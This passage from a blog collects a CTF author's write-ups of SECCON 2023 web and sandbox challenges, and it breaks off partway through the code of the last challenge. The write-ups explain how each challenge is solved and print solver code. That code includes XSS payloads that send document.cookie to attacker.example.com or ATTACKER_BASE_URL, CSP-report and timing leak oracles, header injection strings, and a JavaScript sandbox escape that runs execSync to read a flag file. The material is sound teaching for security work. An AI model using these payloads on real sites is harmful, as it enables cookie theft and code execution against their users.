      '--js-flags="--noexpose_wasm"',
    ],
  });

  const context = await browser.createIncognitoBrowserContext();

  try {
    const page = await context.newPage();
    await page.setCookie({
      name: "FLAG",
      value: FLAG,
      domain: APP_HOST,
      path: "/",
    });
    await page.goto(url, { timeout: 3 * 1000 });
    await sleep(60 * 1000);
    await page.close();
  } catch (e) {
    console.error(e);
  }

  await context.close();
  await browser.close();

  console.log(`end: ${url}`);
};

From the implementation, the goal seems to steal the flag cookie with XS-Leak.

Solution

Obviously, you can perform header injection attacks for a parameter q.

If you access the following URL:

location = "http://localhost:3000?q=" +
  encodeURIComponent(`Content-Type: text/html\n\n<h1>Injected</h1>`)

The website will show:

Is there a useful header that could be used for XS-Leaks?

My solution used Content-Security-Policy-Report-Only:

If the following header exists, a CSP error report is sent to the attacker server when the subresource integrity (SRI) check fails for style-src:

Content-Security-Policy-Report-Only: style-src 'sha256-...'; report-uri http://attacker.example.com

Now, consider the following URL:

location = "http://localhost:3000?q=" + encodeURIComponent(`
Content-Type: text/html
Content-Length: 74
Content-Security-Policy-Report-Only: style-src 'sha256-sUk0UQj8k0hBY6zv2BrvpRoV2OT8ywX8KXOsunsVi9U='; report-uri http://attacker.example.com

<style>`.trimStart())

where sha256-sUk0UQj8k0hBY6zv2BrvpRoV2OT8ywX8KXOsunsVi9U= is the integrity value of the following string:

Status: 200 OK
Content-Type: text/plain; charset=utf-8

SECCON{d

Then, the response body is as follows if the flag cookie is FLAG=SECCON{dummy}:

<style>Status: 200 OK
Content-Type: text/plain; charset=utf-8

SECCON{d

The SRI check will succeed, and the CSP error report won't be sent.

If the SRI check fails, the CSP error report will be sent. Thus, we can use the behavior as an oracle to perform XS-Leaks.

Solver

Here is my full exploit:

Unintended solutions

There were some unintended solutions:

  • Content-Security-Policy-Report-Only + Lazy-loading iframe + Scroll to Text Fragment:
  • Bypassing status checks using %0d:
    • Payload by Paul_Axe from More Smoked Leet Chicken: 
      GET /?q=s%0dtatus:103%20Eearly%20Hints%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:text/html%0d%0a%0d%0a%0d%0a<script>alert(1)</script> HTTP/1.1
    • I added a check !strings.Contains(strings.ToLower(q), "status") to prevent solutions with 100 Continue or 103 Early Hints. However, the above solution succeeded to bypass it using %0d😭
  • Content-Security-Policy-Report-Only with 'report-sample' + utf-16 encoding:
    • Payload by maple3142 from ${CyStick}: 
      http://web:3000/?q=Content-Security-Policy-Report-Only:%20default-src%20%27report-sample%27%3B%20report-uri%20https://YOUR_SERVER/xx%0aContent-Type:text/html%3Bcharset=utf-16%0a%0a%3C%00s%00t%00y%00l%00e%00%3E%00
    • I knew 'report-sample' technique, but I thought it is invalid for this challenge because it can leak only the first 40 characters. The above solution used utf-16 encoding to increase the number of bytes that can be leaked.

Flag

SECCON{leaky_sri}

[web] LemonMD

Description:

🍋📝✨

  • Challenge: http://lemonmd.{int,dom}.seccon.games:3000
  • Admin bot: http://lemonmd.{int,dom}.seccon.games:1337

lemonmd.tar.gz

Overview

This service provides a Markdown editor and shows the preview.

It's implemented with Fresh, which is a web framework for Deno:

Challenge files:

lemonmd
├── docker-compose.yml
├── bot
│  ├── bot.js
│  ├── Dockerfile
│  ├── index.js
│  ├── package-lock.json
│  ├── package.json
│  └── public
│     ├── index.html
│     └── main.js
└── web
   ├── deno.json
   ├── dev.ts
   ├── Dockerfile
   ├── fresh.config.ts
   ├── fresh.gen.ts
   ├── islands
   │  ├── Editor.tsx
   │  └── Preview.tsx
   ├── main.ts
   ├── README.md
   ├── routes
   │  ├── [id].tsx
   │  ├── _app.tsx
   │  ├── index.tsx
   │  └── save.ts
   └── utils
      ├── db.ts
      └── redirect.ts

The goal is to get XSS to steal the flag cookie.

Solution

Step 1: Props Manipulation for Islands Architecture

Fresh uses Islands Architecture, and the following article introduces how islands work in Fresh:

A generated client-side script is as follows (formatted):

<script type="module" nonce="7a73a306c5994dcfae243e3c1f5f8a43">
  import { deserialize } from "/_frsh/js/1b87d6604d1a2bf10bc74f6b5b3491b0b6bc5272/deserializer.js";
  import { signal } from "/_frsh/js/1b87d6604d1a2bf10bc74f6b5b3491b0b6bc5272/signals.js";

  const ST = document.getElementById("__FRSH_STATE").textContent;
  const STATE = deserialize(ST, signal);

  import { revive } from "/_frsh/js/1b87d6604d1a2bf10bc74f6b5b3491b0b6bc5272/main.js";
  import editor_default from "/_frsh/js/1b87d6604d1a2bf10bc74f6b5b3491b0b6bc5272/island-editor.js";
  import preview_default from "/_frsh/js/1b87d6604d1a2bf10bc74f6b5b3491b0b6bc5272/island-preview.js";

  const propsArr = typeof STATE !== "undefined" ? STATE[0] : [];
  revive({editor_default:editor_default,preview_default:preview_default,}, propsArr);
</script>

Fresh renders island components according to a JSON value of:

document.getElementById("__FRSH_STATE").textContent

So, if users can inject an HTML element with id="__FRSH_STATE", it is possible to manipulate the rendering process and potentially change the behavior of the application.

web/islands/Preview.tsx
import type { Signal } from "@preact/signals";
import { render } from "$gfm";

interface PreviewProps {
  text: Signal<string>;
}

export default function Preview(props: PreviewProps) {
  return (
    <div
      class="markdown-body"
      dangerouslySetInnerHTML={{ __html: render(props.text.value) }}
    />
  );
}

Preview renders a parameter text as a Markdown content with deno-gfm. The library prevents XSS attacks with sanitize-html, but allows adding id attributes to some HTML elements:

It means that you can manipulate the value of PreviewProps with an HTML element with id="__FRSH_STATE".

For instance, if you input the following Markdown:

<h1 id="__FRSH_STATE">{"v":{"0":[{"text":{"_f":"s","v":"Successfully manipulated!"}}]}}</h1>

Fresh recognizes Successfully manipulated! as a value of text and renders it:

Step 2: Prototype Pollution in Deserialization

Next, let's take a dive into the implementation of Fresh.

The source code of deserialize is as follows:

export function deserialize(
  str: string,
  signal?: <T>(a: T) => Signal<T>,
): unknown {
  /* ...snip... */

  const { v, r } = JSON.parse(str, reviver);
  const references = (r ?? []) as [string[], ...string[][]][];
  for (const [targetPath, ...refPaths] of references) {
    const target = targetPath.reduce((o, k) => k === null ? o : o[k], v);
    for (const refPath of refPaths) {
      if (refPath.length === 0) throw new Error("Invalid reference");
      // set the reference to the target object
      const parent = refPath.slice(0, -1).reduce(
        (o, k) => k === null ? o : o[k],
        v,
      );
      parent[refPath[refPath.length - 1]!] = target;
    }
  }
  return v;
}

There is no check for Prototype Pollution attacks. It means that you are free to pollute anything you want through the props maniplation of Step 1.

For instance, if you input the following Markdown:

<h1 id="__FRSH_STATE">{"v":{"bar":"foo"},"r":[[["bar"],["constructor","prototype","polluted"]]]}</h1>

The polluted property is polluted to "foo":

Step 3: Prototype Pollution Gadgets to XSS

The rest work you should do is finding a PP gadget to enable XSS attacks.

My solution used a known PP gadget for sanitize-html:

There seemed to be teams that polluted disableHtmlSanitization as a PP gadget:

Solver

Finally, the following Markdown causes XSS and leaks the flag cookie:

const text = `<h1 id="__FRSH_STATE">${JSON.stringify({
  v: {
    0: [
      {
        text: {
          _f: "s",
          v: `&lt;img src=0 onerror="navigator.sendBeacon('${ATTACKER_BASE_URL}', document.cookie)"&gt;`,
        },
      },
    ],
    "*": ["onerror"],
  },
  r: [[["*"], ["constructor", "prototype", "*"]]],
})}</h1>`;

Here is my full exploit:

Flag

SECCON{Do_not_m1x_HTML_injecti0n_and_I5lands_Archit3cture}

[web] DOMLeakify

Description:

NO LEAK, NO LIFE.

  • Challenge: http://domleakify.{int,dom}.seccon.games:3000
  • Admin bot: http://domleakify.{int,dom}.seccon.games:1337

domleakify.tar.gz

Overview

This is a very simple XS-Leak challenge, but the intended difficulty is hard. The source code is as follows.

web/app.py
from flask import Flask, request, render_template

app = Flask(__name__)


@app.get("/")
def leakable():
    flag = request.cookies.get("FLAG", "SECCON{dummy}")[:18]
    return render_template("index.html", flag=flag)
web/templates/index.html
<!doctype html>
<html>
<head>
  <title>DOMLeakify</title>
  <script src="https://cdn.jsdelivr.net/npm/dompurify@3.0.6/dist/purify.min.js"></script>
</head>
<body>
  <h1>DOMLeakify</h1>
  <div id="content"></div>
  <ul>
    {% for i in range(flag|length) %}
      {% set prefix = flag[:i+1] %}
      <li id="{{ prefix }}" class="{{ prefix }}">{{ prefix }}</li>
    {% endfor %}
  </ul>
  <script>
    (() => {
      const html = decodeURIComponent(location.hash.slice(1));
      if (html.length > 512) return;
      document.getElementById("content").innerHTML = DOMPurify.sanitize(html, {
        FORBID_TAGS: ["style"],   // No CSS Injection
        FORBID_ATTR: ["loading"], // No lazy loading
      });
    })();
  </script>
</body>
</html>

The goal is to construct an oracle to leak the IDs of the prefixes.

Also, as an important fact, the admin bot works on Firefox:

const browser = await firefox.launch({
  headless: true,
  firefoxUserPrefs: {
    "javascript.options.wasm": false,
    "javascript.options.baselinejit": false,
  },
});

Solution

document.getElementById("content").innerHTML = DOMPurify.sanitize(html, {
  FORBID_TAGS: ["style"],   // No CSS Injection
  FORBID_ATTR: ["loading"], // No lazy loading
});

This disallows style elements and loading attributes, which are often used for XS-Leak techniques. What can we do under the condition?

In conclusion, my solution used CSS injection on style attributes.

As far as I know, well-known CSS injection techniques always assume that users can inject content into <style> elements, not style attributes. However, the following approach enables to leak IDs using malicious style attributes.

The most important key of my solution is -moz-element(#id):

This is an experimental CSS function and currently only works on Firefox:

The CSS function renders an image generated from the HTML element whose ID is specified by the argument.

For instance, if you access the following URL on Firefox:

http://localhost:3000/#<div style="background-image: -moz-element(#SECCON\7b\64); height: 100px;"></div>

Firefox shows a <div> element that renders a background image generated from the element with id="#SECCON{d":

Next, if you access the following URL on Firefox:

http://localhost:3000/#<div style="background-image: -moz-element(#SECCON\7b\64); height: 100px;"></div>

The <div> element does not render any background image because there is no element with id="#SECCON{a":

Can we utilize this difference to construct an oracle? Yes.

Consider the following element:

<div style="
    background-image: -moz-element(#SECCON\7b\64);
    height: 1000px;
    transform: scale(200) translate(50%, 0%);
    filter: drop-shadow(8px 8px 8px blue);
"></div>

The style attribute applies graphical effects to the background image:

The process is very heavy. If you increase the values of drop-shadow, Firefox will be busy or crash💥

On the other hand, consider the following element:

<div style="
    background-image: -moz-element(#SECCON\7b\61);
    height: 1000px;
    transform: scale(200) translate(50%, 0%);
    filter: drop-shadow(8px 8px 8px blue);
"></div>

The <div> element does not render any background image and the rendering process is light:

Okay, it is possible to detect whether the element with a given ID exists or not using typical XS-Leak techniques to judge the busy state of the browser!

Therefore, using the oracle, it is also possible to leak one character of the flag cookie at a time from the beginning.

Solver

In my solver, the function used for the timing attack is like this:

// https://github.com/arkark/my-ctf-challenges/blob/main/challenges/202312_SECCON_CTF_2023_Finals/web/domleakify/solver/public/main.js#L20-L45

const measure = async (prefix) => {
  const hex = [...prefix]
    .map((c) => "\\" + c.charCodeAt(0).toString(16).padStart(2, "0"))
    .join("");
  const url = `${BASE_URL}#${encodeURIComponent(
    `<div style="background-image: -moz-element(#${hex}); height: 1000px; transform: scale(200) translate(50%, 0%); filter: drop-shadow(36px 36px 36px blue);"></div>`
  )}`;

  const ws = [];

  ws.push(open(url));
  await Promise.all(ws.map((w) => wait(w)));
  await sleep(100);

  let start = performance.now();
  for (let i = 0; i < 3; i++) {
    ws.push(open(BASE_URL));
  }
  await Promise.all(ws.map((w) => wait(w)));
  const end = performance.now();

  for (const w of ws) {
    w.close();
  }
  return end - start;
};

Here is my full exploit:

Unintended solutions

This challenge was solved only by HK Guesser and the solution was unintended. However, it was a creative and interesting oracle using autoplay of <video>:

Flag

SECCON{attr_cssi}

[misc] whitespace.js

Description:

Don't worry, this is not an esolang challenge.

  • Challenge: http://whitespace-js.{int,dom}.seccon.games:3000

whitespace-js.tar.gz

Overview

This is a JavaScript sandbox challenge.

sandbox/index.js
/* snip */

app.post("/", async (req, res) => {
  const { expr } = req.body;

  const proc = await execFile("node", ["whitespace.js", expr], {
    timeout: 2000,
  }).catch((e) => e);

  res.send(proc.killed ? "Timeout" : proc.stdout);
});

/* snip */
sandbox/whitespace.js
const WHITESPACE = " ";

const code = [...process.argv[2].trim()].join(WHITESPACE);
if (code.includes("(") || code.includes(")")) {
  console.log("Do not call functions :(");
  process.exit();
}

try {
  console.log(eval(code));
} catch {
  console.log("Error");
}

The goal is to get RCE to read a flag file with an unknown name.

Solution & Solver

I expected many creative solutions by CTF players that love JavaScript. Actually, each team that solved this challenge used a different solution.

My solver is one example of solutions:

import httpx
import os

BASE_URL = os.environ["WEB_BASE_URL"]


def make_str(xs: str) -> str:
    ys = []
    for x in xs:
        if x == "(":
            ys.append(f'[][{make_str("toString")}][{make_str("toString")}]``[9+8]')
        elif x == ")":
            ys.append(f'[][{make_str("toString")}][{make_str("toString")}]``[9+9]')
        else:
            ys.append(f'"{x}"[1]')
    return "+".join(ys)


command = "cat /flag-*.txt"

func_body = f"console.log(global.process.mainModule.require('child_process').execSync('{command}').toString())"

lines = [
    # [ ].__proto__.source = "**"
    f'[][{make_str("__proto__")}][{make_str("source")}] = {make_str("**")}',

    # [ ].__proto__.flags = func_body
    f'[][{make_str("__proto__")}][{make_str("flags")}] = {make_str(func_body)}',

    # [ ].__proto__.toString = / /.toString
    f'[][{make_str("__proto__")}][{make_str("toString")}] = //[{make_str("toString")}]',

    # -> [].toString() === `/**/${func_body}`


    # Function` `` `
    f'[][{make_str("constructor")}][{make_str("constructor")}]````',
]
expr = ";".join(lines)

res = httpx.post(
    BASE_URL,
    json={
        "expr": expr,
    },
)
print(res.text)

Flag1

SECCON{P4querett3_Down_the_Bunburr0ws}

Footnotes

  1. https://store.steampowered.com/app/1628610/

]]> CTF <![CDATA[SECCON CTF 2023 Quals: Author Writeups]]> https://blog.arkark.dev/2023/09/21/seccon-quals https://blog.arkark.dev/2023/09/21/seccon-quals Thu, 21 Sep 2023 00:00:00 GMT Thank you for playing SECCON CTF 2023 Quals! I created some challenges for this CTF, just like 2021 and 2022. I hope you had fun and I'm looking forward to reading your writeups.

My challenges:

ChallengeCategoryIntended
Difficulty		KeywordsSolved / 653
blinkwebeasyDOM clobbering14
eeeeejswebmediumejs, XSS puzzle12
hidden-notewebhardXS-Leak, unstable sort1
craboxsandboxwarmupRust sandbox53
node-ppjailsandboxmediumprototype pollution5
deno-ppjailsandboxhardprototype pollution2

I added the source code and author's solvers to my-ctf-challenges repository.

Description:

Popover API is supported from Chrome 114. The awesome API is so useful that you can easily implement <blink>.

  • Challenge: http://blink.seccon.games:3000
  • Admin bot: http://blink.seccon.games:1337

blink.tar.gz

Overview

This website implements the behavior of <blink> using Popover API.

If you submit Hello, blink!,

then the website shows a blinking iframe of the text:

The JavaScript code of the client-side is simple:

const wrap = (obj) =>
  new Proxy(obj, {
    get: (target, prop) => {
      const res = target[prop];
      return typeof res === "function" ? res.bind(target) : res;
    },
    set: (target, prop, value) => (target[prop] = value),
  });

const $ = wrap(document).querySelector;

const sandboxAttribute = [
  "allow-downloads",
  "allow-forms",
  "allow-modals",
  "allow-orientation-lock",
  "allow-pointer-lock",
  "allow-popups",
  "allow-popups-to-escape-sandbox",
  "allow-presentation",
  "allow-same-origin",
  // "allow-scripts", // disallow
  "allow-top-navigation",
  "allow-top-navigation-by-user-activation",
  "allow-top-navigation-to-custom-protocols",
].join(" ");

const createBlink = async (html) => {
  const sandbox = wrap(
    $("#viewer").appendChild(document.createElement("iframe"))
  );

  // I believe it is impossible to escape this iframe sandbox...
  sandbox.sandbox = sandboxAttribute;

  sandbox.width = "100%";
  sandbox.srcdoc = html;
  await new Promise((resolve) => (sandbox.onload = resolve));

  const target = wrap(sandbox.contentDocument.body);
  target.popover = "manual";
  const id = setInterval(target.togglePopover, 400);

  return () => {
    clearInterval(id);
    sandbox.remove();
  };
};

$("#render").addEventListener("click", async () => {
  const html = $("#html").value;
  if (!html) return;
  location.hash = html;

  const deleteBlink = await createBlink(html);
  const button = wrap(
    $("#viewer").appendChild(document.createElement("button"))
  );
  button.textContent = "Delete";
  button.addEventListener("click", () => {
    deleteBlink();
    button.remove();
  });
});

const initialHtml = decodeURIComponent(location.hash.slice(1));
if (initialHtml) {
  $("#html").value = initialHtml;
  $("#render").click();
}

The goal is to gain an XSS to steal an admin bot's cookie.

Solution

By the following sandbox setting, you cannot run any JavaScript in iframe elements:

const sandboxAttribute = [
  "allow-downloads",
  "allow-forms",
  "allow-modals",
  "allow-orientation-lock",
  "allow-pointer-lock",
  "allow-popups",
  "allow-popups-to-escape-sandbox",
  "allow-presentation",
  "allow-same-origin",
  // "allow-scripts", // disallow
  "allow-top-navigation",
  "allow-top-navigation-by-user-activation",
  "allow-top-navigation-to-custom-protocols",
].join(" ");

You need to find an XSS sink outside iframe elements.

In conclusion, the sink is:

const id = setInterval(target.togglePopover, 400);

setTimeout and setInterval has an interesting behavior:

It means that setInterval can be XSS sinks if target.togglePopover.toString is controllable.

Interestingly, DOM clobbering enables it!

If you render the following HTML:

<iframe
  name="body"
  srcdoc="<a id=togglePopover href=foobar:if(!window.sent)window.sent=navigator.sendBeacon('https://attacker.example.com',document.cookie)></a>"
></iframe>

then, the following JavaScript will be executed in setInterval:

foobar:if(!window.sent)window.sent=navigator.sendBeacon('https://attacker.example.com',document.cookie)

Solver

Here is my solver:

Flag

SECCON{blink_t4g_is_no_l0nger_supported_but_String_ha5_blink_meth0d_y3t}

BTW, the title bl👁nk in the website is a pun on the words "eye" (/aɪ/) and "i" (/aɪ/). Did anyone notice this?

Background

If you are unfamiliar with DOM clobbering attacks, you might want to refer to HackTricks:

Also, I created another DOM clobbering challenge last year. Check it!

[web] eeeeejs

Description:

Can you bypass all mitigations?

  • Challenge: http://eeeeejs.seccon.games:3000
  • Admin bot: http://eeeeejs.seccon.games:1337

eeeeejs.tar.gz

Overview

In this challenge, a target file path and a query object passed into an EJS rendering engine are controllable:

const ejs = require("ejs");

const { filename, ...query } = JSON.parse(process.argv[2].trim());
ejs.renderFile(filename, query).then(console.log);

This is one of the EJS option injection challenges. The following post may be helpful if you are unfamiliar with the attacks:

This challenge implements 4 mitigations for the attacks:

const { xss } = require("express-xss-sanitizer");
/* snip */

// Mitigation 1:
app.use(xss());
// Mitigation 2:
app.use((req, res, next) => {
  // A protection for RCE
  // FYI: https://github.com/mde/ejs/issues/735

  const evils = [
    "outputFunctionName",
    "escapeFunction",
    "localsName",
    "destructuredLocals",
    "escape",
  ];

  const data = JSON.stringify(req.query);
  if (evils.find((evil) => data.includes(evil))) {
    res.status(400).send("hacker?");
  } else {
    next();
  }
});
// Mitigation 3:
app.use((req, res, next) => {
  res.set("Content-Security-Policy", "default-src 'self'");
  next();
});
// Mitigation 4:
"--experimental-permission",
`--allow-fs-read=${__dirname}/src`,

The goal is to bypass the above mitigations and gain an XSS.

Solution

There are various approaches to solving this challenge. My solution is one of them. If you are interested in other solutions, join the CTF Discord and see #web channel.

My solution is:

const jsPayload = `location = "https://attacker.example.com?" + document.cookie`;

const srcUrl = `/?${new URLSearchParams({
  filename: "render.dist.js",
  "settings[view options][openDelimiter]": "__require() {\n",
  "settings[view options][closeDelimiter]": "||",
  "settings[view options][delimiter][]": "",
  mod: jsPayload,
})}`;

const evilUrl = `http://web:3000?${new URLSearchParams({
  "filename[href]": "x",
  "filename[origin]": "x",
  "filename[protocol]": "file:",
  "filename[hostname]": "",
  "filename[pathname]": "index.ejs",
  [`filename[<script src=${srcUrl}></script>]`]: "",
  "settings[view options][debug]": "1",
})}`;

For the first URL srcUrl:

  • It abuses the following part of render.dist.js: 
    /* snip */
    var __commonJS = (cb, mod) => function __require() {
      return mod || (0, cb[__getOwnPropNames(cb)[0]])((mod = { exports: {} }).exports, mod), mod.exports;
    };
    /* snip */
  • By the EJS options, it executes return mod as JavaScript and the value of mod is rendered as a page.
  • Thus, the string jsPayload is rendered.

For the second URL evilUrl:

Solver

Here is my solver:

Flag

SECCON{RCE_is_po55ible_if_mitigation_4_does_not_exist}

[web] hidden-note

Description:

Shared pages hide your secret notes.

  • Challenge: http://hidden-note.seccon.games:3000
  • Admin bot: http://hidden-note.seccon.games:1337

hidden-note.tar.gz

Overview

There is a simple note application. You can create and delete notes.

You can also search notes with a query string.

If you share your notes, a static page is created and anyone who knows the URL can access it.

The admin bot's scenario is as follows:

// Create a flag note
const page1 = await context.newPage();
await page1.goto(APP_URL);
await page1.waitForSelector("#content");
await page1.type("#content", FLAG);
await page1.waitForSelector("#create");
await Promise.all([
  page1.click("#create"),
  page1.waitForNavigation({ timeout: 1000 }),
]);
await page1.close();

// Visit your URL
const page2 = await context.newPage();
await page2.goto(url, { timeout: 3 * 1000 });
await sleep(60 * 1000);
await page2.close();

The goal is to steal the admin's note including a flag.

Solution

Step 1: Understanding the challenge structure

The implementation for sharing pages:

indexTmpl, _ := template.ParseFiles("views/index.html")
secretPattern := regexp.MustCompile("SECCON{.*}")

router.GET("/share", func(c *gin.Context) {
    user := c.MustGet("user").(*User)
    notes, err := user.getNotes(user.Query)
    if err != nil {
        c.String(500, "Failed to read notes")
        return
    }

    // Hide your secret notes 🤫
    notes = lo.Filter(notes, func(note Note, _ int) bool {
        return !secretPattern.MatchString(note.Content)
    })

    fileName := getRandomHex(12) + ".html"
    file, err := os.OpenFile(fmt.Sprintf("shared/%s", fileName), os.O_CREATE|os.O_WRONLY, 0600)
    if err != nil {
        c.Status(500)
        return
    }
    if err := indexTmpl.Execute(file, gin.H{
        "user":   user,
        "notes":  notes,
        "shared": true,
    }); err != nil {
        c.Status(500)
        return
    }
    c.Redirect(302, fmt.Sprintf("/shared/%s", fileName))
})

router.Static("/shared", "./shared")

Obliviously a HTML injection vulnerability exists because it uses text/tamplate.

indexTmpl, _ := template.ParseFiles("views/index.html")

The CSP prevents XSS attacks:

<meta http-equiv="Content-Security-Policy" content="script-src 'none'; style-src https://cdn.jsdelivr.net/npm/bulma@0.9.4/css/bulma.min.css">

However, you can leak URLs of shared pages using meta tag redirect technique:

<meta name="referrer" content="unsafe-url">
<meta http-equiv="Refresh" content="0; URL=http://attacker.example.com">

By the technique, you can access shared pages because you can create notes and share them on the admin's session by CSRF.

Is the remaining task to see a flag note in shared pages? The answer is no. The most impotant point in this challenge is that shared pages do not show a flag note:

// Hide your secret notes 🤫
notes = lo.Filter(notes, func(note Note, _ int) bool {
    return !secretPattern.MatchString(note.Content)
})

Somehow you have to find a way to steal the content of the hidden note.

Step 2: XS-Leak with an algorithm-based oracle

The goal in this step to construct an oracle for XS-Leak to steal the hidden note.

In conclusion, the key of the oracle is "unstable sort".

The implementation for getting notes:

func (user *User) getNotes(query string) ([]Note, error) {
    files, err := os.ReadDir(fmt.Sprintf("notes/%s", user.ID))
    if err != nil {
        return nil, err
    }
    notes := make([]Note, 0, len(files))
    for _, file := range files {
        content, err := os.ReadFile(fmt.Sprintf("notes/%s/%s", user.ID, file.Name()))
        if err != nil {
            return nil, err
        }
        notes = append(notes, Note{
            ID:      file.Name(),
            Content: string(content),
        })
    }
    notes = lo.Filter(notes, func(note Note, _ int) bool {
        return strings.Contains(note.Content, query)
    })
    sort.Slice(notes, func(i, j int) bool {
        return notes[i].Content < notes[j].Content
    })
    return notes, nil
}

It uses sort.Slice:

sort.Slice(notes, func(i, j int) bool {
    return notes[i].Content < notes[j].Content
})

The document says:

The sort is not guaranteed to be stable: equal elements may be reversed from their original order. For a stable sort, use SliceStable.

The sort algorithm is Pattern-defeating Quicksort (pdqsort)1. It is used from Go 1.19:

The implementation is:

// From: https://github.com/golang/go/blob/go1.21.0/src/sort/zsortfunc.go#L61-L75
func pdqsort_func(data lessSwap, a, b, limit int) {
    const maxInsertion = 12

    var (
        wasBalanced    = true // whether the last partitioning was reasonably balanced
        wasPartitioned = true // whether the slice was already partitioned
    )

    for {
        length := b - a

        if length <= maxInsertion {
            insertionSort_func(data, a, b)
            return
        }

        /* snip */

The shuffle part with xorshift:

// From: https://github.com/golang/go/blob/go1.21.0/src/sort/zsortfunc.go#L240-L254
func breakPatterns_func(data lessSwap, a, b int) {
    length := b - a
    if length >= 8 {
        random := xorshift(length)
        modulus := nextPowerOfTwo(length)

        for idx := a + (length/4)*2 - 1; idx <= a+(length/4)*2+1; idx++ {
            other := int(uint(random.Next()) & (modulus - 1))
            if other >= length {
                other -= length
            }
            data.Swap(idx, a+other)
        }
    }
}

Thus, the sort algorithm has the following properties:

  • Case 1: If the length <= 12, it uses insertion sort (a stable sort).
  • Case 2: Otherwise, the order will be shuffled2.

Let's confirm the behavior:

package main

import (
	"fmt"
	"sort"
)

type Note struct {
	ID      int
	Content string
}

func test_sort(length int) {
	notes := make([]Note, 0, length)
	notes = append(notes, Note{ID: -1, Content: "x"})
	for i := 0; i < length-1; i++ {
		notes = append(notes, Note{ID: i, Content: "test"})
	}
	// assert: len(notes) == length

	sort.Slice(notes, func(i, j int) bool {
		return notes[i].Content < notes[j].Content
	})

	fmt.Println("length:", length)
	fmt.Println(notes)
}

func main() {
	// Case 1:
	test_sort(11)
	test_sort(12)

	fmt.Println()

	// Case 2:
	test_sort(13)
	test_sort(14)
}
$ go run main.go
length: 11
[{0 test} {1 test} {2 test} {3 test} {4 test} {5 test} {6 test} {7 test} {8 test} {9 test} {-1 x}]
length: 12
[{0 test} {1 test} {2 test} {3 test} {4 test} {5 test} {6 test} {7 test} {8 test} {9 test} {10 test} {-1 x}]

length: 13
[{5 test} {0 test} {1 test} {2 test} {3 test} {4 test} {6 test} {7 test} {8 test} {9 test} {10 test} {11 test} {-1 x}]
length: 14
[{5 test} {7 test} {1 test} {2 test} {3 test} {4 test} {0 test} {12 test} {9 test} {8 test} {6 test} {10 test} {11 test} {-1 x}]

By abusing this behavior, it is possible to construct an oracle. You can leak the length of a sorted array and judge whether the array includes the flag note or not.

See my solver below for details.

Solver

Here is my full exploit:

Flag

SECCON{pdq_1e4k}

[sandbox] crabox

Description:

🦀 Compile-Time Sandbox Escape 🦀

nc crabox.seccon.games 1337

crabox.tar.gz

Overview

Challenge file:

import sys
import re
import os
import subprocess
import tempfile

FLAG = os.environ["FLAG"]
assert re.fullmatch(r"SECCON{[_a-z0-9]+}", FLAG)
os.environ.pop("FLAG")

TEMPLATE = """
fn main() {
    {{YOUR_PROGRAM}}

    /* Steal me: {{FLAG}} */
}
""".strip()

print("""
🦀 Compile-Time Sandbox Escape 🦀

Input your program (the last line must start with __EOF__):
""".strip(), flush=True)

program = ""
while True:
    line = sys.stdin.readline()
    if line.startswith("__EOF__"):
        break
    program += line
if len(program) > 512:
    print("Your program is too long. Bye👋".strip())
    exit(1)

source = TEMPLATE.replace("{{FLAG}}", FLAG).replace("{{YOUR_PROGRAM}}", program)

with tempfile.NamedTemporaryFile(suffix=".rs") as file:
    file.write(source.encode())
    file.flush()

    try:
        proc = subprocess.run(
            ["rustc", file.name],
            cwd="/tmp",
            stdout=subprocess.DEVNULL,
            stderr=subprocess.DEVNULL,
            timeout=2,
        )
        print(":)" if proc.returncode == 0 else ":(")
    except subprocess.TimeoutExpired:
        print("timeout")

You can insert any Rust program, and the goal is to steal a flag in the comment in the inserted source code.

print(":)" if proc.returncode == 0 else ":(")

At this line, you can get information about whether the compilation by rustc is successful or not.

Solution

Just like C++ and D, Rust evaluate some expressions at compile-time:

Also, there are useful macros in Rust standard library:

You can evaluate the content of the self-file including a flag at compile-time.

let content = include_bytes!(file!());

The remaining task is to construct an oracle that judges whether content contains a given string or not.

An example of implementation:

const fn _contains(query: &[u8]) {
    let content = include_bytes!(file!());

    let mut i = 350;
    while i < content.len() {
        let mut j = 0;
        while j < query.len() && i + j < content.len() && content[i + j] == query[j] {
            j += 1;
        }
        if j == query.len() {
            return; // found!
        }
        i += 1;
    }
    assert!(false); // not found
}

Finally, you can get the entire flag string using this function.

As another solution, you can also use /proc/1/environ instead of file!().

Solver

import os
import pwn
import string

pwn.context.log_level = "error"


def communicate(program: str):
    assert len(program) <= 512
    io = pwn.remote(os.getenv("SECCON_HOST"), os.getenv("SECCON_PORT"))
    io.sendlineafter(b"):", program.encode())
    io.sendline(b"__EOF__")

    res = io.recvall().decode().strip()
    io.close()
    return res


TEMPLATE = """
}

static _CTFE: () = _contains(b"{{QUERY}}");

const fn _contains(query: &[u8]) {
    let content = include_bytes!(file!());

    let mut i = 350;
    while i < content.len() {
        let mut j = 0;
        while j < query.len() && i + j < content.len() && content[i + j] == query[j] {
            j += 1;
        }
        if j == query.len() {
            return; // found!
        }
        i += 1;
    }
    assert!(false); // not found
""".strip().replace("    ", "")


def oracle(query: str) -> bool:
    program = TEMPLATE.replace("{{QUERY}}", query)
    return ":)" in communicate(program)


CHARS = "}_" + string.ascii_lowercase + string.digits
known = "SECCON{"
while not known.endswith("}"):
    for c in CHARS:
        if oracle(known + c):
            known += c
            break
    else:
        print("Not found")
        exit(1)
    print(known)
print("Flag: " + known)

Flag

SECCON{ctfe_i5_p0w3rful}

CTFE stands for Compile-Time Function Evaluation.

[sandbox] deno-ppjail

Description:

Do you like Deno better than Node?

nc deno-ppjail.seccon.games 1337

🦕 deno-ppjail.tar.gz

Overview

Challenge file:

const CUSTOM_KEY = "__custom__";
const CUSTOM_TYPES = [
  "Object",
  "String",
  "Boolean",
  "Array",
  "Function",
  "RegExp",
];

type Dict = Record<string, unknown>;
type Custom = {
  [CUSTOM_KEY]: true;
  type: string;
  args: unknown[];
};

const isDict = (value: unknown): value is Dict => {
  return value === Object(value);
};

const isCustom = (value: unknown): value is Custom => {
  return isDict(value) && !!value[CUSTOM_KEY];
};

const set = (target: unknown, key: string, value: unknown) => {
  if (!isDict(target)) return;
  if (key in target) return;
  target[key] = value;
};

const merge = (target: unknown, input: Dict) => {
  if (!isDict(target)) return;
  for (const key of Object.keys(input)) {
    const value = input[key];
    if (!isDict(value)) {
      set(target, key, value);
    } else if (Array.isArray(value)) {
      set(target, key, []);
      merge(target[key], value);
    } else if (!isCustom(value)) {
      set(target, key, {});
      merge(target[key], value);
    } else {
      const { type, args } = value;
      if (CUSTOM_TYPES.includes(type)) {
